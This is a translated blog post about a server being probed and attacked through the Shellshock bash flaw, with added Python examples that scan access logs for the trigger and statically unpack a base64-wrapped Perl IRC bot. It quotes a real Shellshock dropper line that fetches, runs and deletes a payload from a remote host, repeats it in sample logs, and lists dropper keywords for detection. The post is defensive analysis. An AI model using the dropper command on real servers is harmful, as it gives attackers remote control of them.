
Start of active use of ShellShock


Good time of day, %username%! I want to tell a story about how my server is attacked every day through CVE-2014-6271 (Shellshock). For those who somehow missed it, there are two publications on Habr: "CVE-2014-6271, CVE-2014-7169: remote code execution in Bash" and "New dangerous vulnerability ShellShock allows attacking many devices, from smartphones to industrial servers".

So, after the information became public, I began to see requests in the server logs whose headers contained a call to bash. At first these were innocuous requests, where the Referer and User-Agent headers of the HTTP request contained a bash call of the form ping xxx.xxx.xxx.xxx; you can guess that this was already a search for potential victims.
Tonight it became much more interesting. Checking the server logs, I came across the following request:

...
UserAgent: () { :;}; /bin/bash -c "wget -O /var/tmp/ec.z 74.YYY.YYY.YY/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*"
...
(Using wget, the file is downloaded from the remote server, given execute permission, run, and then deleted.)
(The IP address has been deliberately obscured.)

Obviously, this is about mass infection of servers with bots.
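As an added example (not code from the original post), here is a small Python scanner that looks for the Shellshock trigger, a header value beginning with a bash function definition `() {`, in the request line, Referer and User-Agent fields of Apache combined-format log lines, and tells harmless ping probes apart from download-and-run droppers like the one above. The log lines are constructed for the example and every address in them is a placeholder, not the attacker's real IP.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format log lines (assumption: the server logs in
# this format). All addresses are documentation/placeholder ranges, not real
# attackers. Line 1 is ordinary traffic, line 2 mirrors the ping probe and
# line 3 the wget dropper described in the post.
SAMPLE_LOG = r'''
203.0.113.5 - - [25/Sep/2014:10:01:02 +0400] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"
198.51.100.7 - - [25/Sep/2014:11:15:30 +0400] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 "() { :;}; ping -c 1 192.0.2.10" "() { :;}; ping -c 1 192.0.2.10"
198.51.100.9 - - [26/Sep/2014:02:40:11 +0400] "GET /cgi-bin/status.cgi HTTP/1.0" 200 12 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 192.0.2.20/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
'''

# One combined-format line; quoted fields may contain backslash-escaped quotes.
QUOTED = r'(?:[^"\\]|\\.)*'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>' + QUOTED + r')" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>' + QUOTED + r')" "(?P<ua>' + QUOTED + r')"$'
)

# The Shellshock trigger is a header value that starts a bash function
# definition; everything after the closing "};" is what bash would run.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{(?P<rest>.*)', re.S)

# Substrings that turn a mere probe into a download-and-run attempt.
DROPPER_HINTS = ("wget", "curl", "chmod", "/tmp/", "rm -rf", "perl ", "python")


def classify(cmd):
    """'dropper' if the injected command fetches or runs a payload, else 'probe'."""
    lowered = cmd.lower()
    return "dropper" if any(h in lowered for h in DROPPER_HINTS) else "probe"


def scan_line(line):
    """Return a list of findings for one log line (empty if clean or unparsable)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    for field in ("request", "referer", "ua"):
        # Undo URL-encoding and log escaping so obfuscated variants still match.
        value = unquote(m.group(field)).replace('\\"', '"')
        hit = SHELLSHOCK_RE.search(value)
        if not hit:
            continue
        rest = hit.group("rest")
        cmd = rest.split("};", 1)[1].strip() if "};" in rest else rest.strip()
        findings.append({
            "ip": m.group("ip"),
            "time": m.group("time"),
            "field": field,
            "command": cmd,
            "kind": classify(cmd),
        })
    return findings


def scan_log(text):
    """Scan a whole log and collect every Shellshock finding."""
    results = []
    for line in text.strip().splitlines():
        results.extend(scan_line(line.strip()))
    return results


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} [{f['kind']}] via {f['field']}: {f['command']}")
```

The scanner keys on the `() {` prefix rather than on the exact `() { :;};` string, because the trigger only requires a value that bash parses as a function definition; the part after `};` is what would execute, so that is what gets classified. Run it over the real access log with `scan_log(open(path).read())` and feed the "dropper" findings to whatever blocks source addresses.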

Well, I downloaded this file; it turned out to be a Perl script. Running it through VirusTotal, we see only one detection:

Sophos - Mal/PerlBot-A

The rest say that everything is OK.

Well, let's see. Opening the file in a text editor, we see:

#!/usr/bin/perl
use MIME::Base64;
eval(decode_base64('IyEvdXNyL2Jpbi9wZXJsDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj ..... MjIyMjIyMjIyMNCg=='));

Here everything is immediately clear: a typical trick for hiding code. Well, decode the base64 and we get the following:

##
## perlBot v1.02012 By unknown @unknown ## [ Help ] ####################################
##
Now everything is clear. Another backdoor for remote control, managed via IRC. I am not very familiar with Perl, but having run through the file it is noticeable that its functionality includes privilege escalation (by guessing the root password; the dictionary is rather small), flooding, and running some utilities (mail, port scanning, DNS resolution).
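Added example, not from the original post: the same unpacking done statically in Python, with the eval replaced by a decoder so the payload is never executed, followed by a pull of the IRC settings a bot of this kind carries. The dropper text, the inner script, the IRC hostname and the channel name are all constructed placeholders, and the variable names the indicator regexes look for are assumptions to adjust per sample.

```python
import base64
import re

# Constructed stand-in for the inner bot script. It only reproduces the banner
# and a few IRC-style settings such bots carry; the hostname and channel are
# placeholders and nothing here connects anywhere.
INNER_SCRIPT = """#!/usr/bin/perl
##
## perlBot v1.02012 By unknown @unknown ## [ Help ] ####
##
my $server = 'irc.example.invalid';
my $port = 6667;
my @channels = ('#placeholder');
"""

# Constructed dropper in the shape seen in the post: a wrapper that
# base64-decodes the real script and hands it to eval.
DROPPER = (
    "#!/usr/bin/perl\nuse MIME::Base64;\n"
    "eval(decode_base64('" + base64.b64encode(INNER_SCRIPT.encode()).decode() + "'));\n"
)

# eval(decode_base64('...')) with the blob captured; whitespace inside the
# blob is tolerated because real samples often wrap it across lines.
EVAL_RE = re.compile(r"eval\s*\(\s*decode_base64\s*\(\s*'([A-Za-z0-9+/=\s]+)'\s*\)\s*\)")

# Assumed variable names for the indicators we pull out; adjust per sample.
INDICATORS = {
    "banner": re.compile(r"perlBot\s+v[\d.]+"),
    "irc_server": re.compile(r"\$server\s*=\s*'([^']+)'"),
    "irc_port": re.compile(r"\$port\s*=\s*(\d+)"),
    "channels": re.compile(r"@channels\s*=\s*\(([^)]*)\)"),
}


def unpack_layers(script, max_layers=5):
    """Peel nested eval(decode_base64(...)) wrappers; never executes anything."""
    layers = [script]
    for _ in range(max_layers):
        m = EVAL_RE.search(layers[-1])
        if not m:
            break
        blob = re.sub(r"\s+", "", m.group(1))
        layers.append(base64.b64decode(blob).decode("utf-8", "replace"))
    return layers


def extract_indicators(script):
    """Pull the C2 hostname, port, channels and banner out of a decoded layer."""
    found = {}
    for name, rx in INDICATORS.items():
        m = rx.search(script)
        if m:
            found[name] = m.group(1) if m.groups() else m.group(0)
    return found


def analyse(dropper):
    """Static triage: how many layers were unpacked and what the final one reveals."""
    layers = unpack_layers(dropper)
    return {"layers": len(layers), "indicators": extract_indicators(layers[-1])}


if __name__ == "__main__":
    report = analyse(DROPPER)
    print(f"unpacked {report['layers']} layer(s)")
    for k, v in report["indicators"].items():
        print(f"  {k}: {v}")
```

The point of unpacking in a separate interpreter, rather than swapping the eval for a print in Perl, is that nothing in the sample runs even by accident, and the loop handles droppers that stack several base64 layers. The hostname and port that fall out are the values worth blocking at the firewall and searching for in outbound connection logs.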

In conclusion, I would like to give some advice to novice system administrators.

Keep an eye on the systems in your care! If you think bash is not involved in your systems in any way, you may be making a big mistake.

Bash is used by Apache (mod_cgi, mod_cgid), DHCP clients, OpenSSH, as well as Git and Subversion, and of course your router may be vulnerable too.

On GitHub there are plenty of public repositories for carrying out attacks, quite apart from the fact that this vulnerability is so easy to exploit that any novice pest can handle it.

Related Links

Information about PerlBot (modification) [EN];
Article from DigitalOcean on how to protect against Shellshock [EN].

Source: https://habr.com/ru/post/238539/
